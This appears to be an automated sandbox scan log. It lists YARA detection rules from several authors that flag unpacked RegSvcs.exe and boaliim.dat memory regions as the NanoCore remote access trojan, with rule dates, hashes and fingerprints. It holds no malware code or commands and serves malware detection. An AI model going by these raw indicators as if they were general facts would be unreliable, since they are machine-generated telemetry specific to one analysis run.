Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
